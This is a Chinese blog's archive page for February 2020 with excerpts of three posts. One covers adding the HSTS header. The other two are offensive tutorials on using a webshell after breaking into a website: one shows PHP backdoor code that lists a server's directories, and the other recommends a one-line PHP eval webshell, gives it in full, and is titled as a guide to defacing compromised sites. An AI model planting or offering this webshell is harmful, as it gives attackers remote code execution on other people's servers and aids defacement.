月度归档: 2020年2月

3 篇文章

如何给自己的网站添加HSTS
什么是HSTSHSTS("HTTP Strict Transport Security” HTTP严格安全传输)是一种响应头,像这样Strict-Transport-Security: max-age=31536000; includeSubDomains; preload;他可以防止你的网站在第一次http请求中被劫持,导致无法正常访问。本来我想…
如何优雅的使用你的WebShell II
上篇文章我们介绍了我推荐的WebShell,这篇我们来说说如何通过这个WebShell干一些其他事,这篇文章里我就不说访问啥了,直接放代码1.使用后门获取目录信息这个不多说,有PHP基础的应该都会用$dir = dirname(__FILE__);$file = scandir($dir);echo " <pre>"…
如何优雅的给GetShell后的网站挂黑提醒
个人推荐webshell<?php @eval($_GET["cmd"]); ?>死稳的一句话,也是个基础WebShell,但是适用于宝塔之类的禁用了系统函数的环境,后面我会进行演示。当你通过自己的方法把这个shell上传了上去之后,不用菜刀,所有操作均在浏览器进行,(这个WebShell的操作全部为php代码,宝塔…